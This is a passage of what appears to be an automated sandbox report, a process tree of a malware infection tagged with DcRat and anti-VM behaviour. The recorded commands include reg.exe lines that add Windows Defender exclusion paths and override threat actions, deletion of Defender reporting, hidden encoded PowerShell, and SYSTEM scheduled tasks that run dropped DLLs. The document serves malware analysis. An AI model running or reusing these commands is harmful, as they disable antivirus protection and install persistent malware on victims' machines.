                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:6128
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:5976
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:5844
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:1852
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:236
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:5716
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:5868
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:5144
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:4664
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              4⤵
                                                                                                                                                PID:5032
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:5552
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:4992
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5888
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2836
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5260
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:688
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5900
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5292
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5576
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4896
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5940
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:2240
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2464
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5336
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:2500
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5528
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4964
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /CREATE /TN "gzPTGpYdK" /SC once /ST 02:26:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                              2⤵
                                                                                                                                                                              • DcRat
                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                              PID:6068
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /run /I /tn "gzPTGpYdK"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:932
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:5880
                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /DELETE /F /TN "gzPTGpYdK"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4324
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 01:43:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gEpmovQ.exe\" Ty /Qgsite_idVjQ 385118 /S" /V1 /F
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • DcRat
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:924
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /run /I /tn "mRaseIvrfxDtBOYKW"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:1264
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                    PID:2880
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F91F.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F91F.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4184
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 1040
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:4300
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 1040
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:712
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5896
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\19B.bat" "
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4604
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5196
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1BDB.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1BDB.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:5200
                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3540
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 592
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:5968
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5256
                                                                                                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5332
                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4904
                                                                                                                                                                                              • \??\c:\windows\system32\gpscript.exe
                                                                                                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5392
                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                  explorer.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Modifies Installed Components in the registry
                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                  PID:5552
                                                                                                                                                                                                • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2760
                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                    PID:3172
                                                                                                                                                                                                  • C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gEpmovQ.exe
                                                                                                                                                                                                    C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gEpmovQ.exe Ty /Qgsite_idVjQ 385118 /S
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Drops Chrome extension
                                                                                                                                                                                                    • Drops desktop.ini file(s)
                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                    PID:3448
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2136
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:3628
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4008
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:3684
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:3752
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\JrEdxH.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • DcRat
                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                PID:5056
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\yRwsoNR.xml" /RU "SYSTEM"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • DcRat
                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                PID:6024
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /END /TN "eGwAoTnpAObQfPU"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:656
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:3012
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\UyRBcxf.xml" /RU "SYSTEM"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                    PID:3484
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\MewQHuW.xml" /RU "SYSTEM"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                    PID:3008
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\mOezjgM.xml" /RU "SYSTEM"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                    PID:6040
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\INCfkRv.xml" /RU "SYSTEM"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                    PID:4068
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 03:57:05 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\GpKCjvQh\DOrIcpr.dll\",#1 /vzsite_idfGr 385118" /V1 /F
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                    PID:3660
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /run /I /tn "FTXCzbcEvROqagNdd"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4340
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:5064
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:3972
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:1684
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:4048
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:3948
                                                                                                                                                                                                                            • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                                                                                              c:\windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\GpKCjvQh\DOrIcpr.dll",#1 /vzsite_idfGr 385118
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:5036
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\GpKCjvQh\DOrIcpr.dll",#1 /vzsite_idfGr 385118
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                  PID:3920
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:3672
